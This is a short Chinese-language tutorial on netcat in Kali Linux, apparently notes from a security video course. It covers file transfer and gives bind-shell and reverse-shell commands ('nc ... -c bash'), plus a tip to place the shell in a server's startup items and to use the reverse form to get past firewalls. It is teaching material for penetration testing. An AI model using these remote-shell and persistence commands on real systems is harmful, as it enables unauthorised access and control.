kail linux 下nc工具的基本使用(安全牛視頻)
阿新 • • 發佈:2018-09-03
效果 設計 思路 all 可靠 加密方法 了解 一個 網站
一、簡介
nc是netcat的簡寫,有著網絡界的瑞士×××美譽。因為它短小精悍、功能實用,被設計為一個簡單、可靠的網絡工具。
nc 常用的命令有兩個:
1、-v 輸出詳細的交互或者出錯信息
2、-n 如果後面是ip地址不會進行dns解析
eg:nc -vn 192.168.11.11 8888
二、利用nc文本傳輸:
類似於socket一個作為服務端,一個作為客戶端。
服務端命令:nc -l -p 端口
客戶端命令: nc -vn ip port
拓展:
在電子取證的時候會用到。用 | 管道符將客戶端輸出的結果發送到服務端。
傳輸文件:
接收方命令: nc -lp 333>1.txt
發送方命令:nc -nv 111.11.11.11 333 <2 .txt
三、利用nc實現遠程控制
將自己的shell腳本放在自己的端口處等待連接或者接受對方傳送過來的shell窗口來實現遠程控制。
方法一; nc -lp 333 -c bash(nc -vn 192.168.22.22 333)(等待對方來連接)
方法二:nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)(接受對方的shell窗口)
×××思路:
可以將該命令寫成腳本,然後放在服務器的開機啟動項裏面。
因為網站防火墻的存在,進制在外面通過端口想裏面發送東西,故可以嘗試第二中方法。
tips:
在window用戶中應將bash 改為cmd
四、nc工具拓展
通過管道符號結合nc命令會產生意想不到的效果
比如利用nc命令結合壓縮命令可以發送整個壓縮包。
五、缺陷
1、明文傳輸,容易被嗅探(可以通過系統加密方法)
2、缺乏身份驗證機制,不安全,容易被其他人盜用。
3、不同版本的nc是不同的、參數也有可能不同。unbutn版本的nc沒有-c
六、拓展
1、為了解決上面的問題,便出現了ncat工具,該工具是nmap工具集中的一個工具。
2、命令:服務器端:ncat -c bash --allow “you ip” - vnl 333 --ssl
客戶端: ncat -vn “ip” “端口 ” --ssl
每次連接的哈希值是會改變的,ncat可以實現的功能都可以通過nc實現。
kail linux 下nc工具的基本使用(安全牛視頻)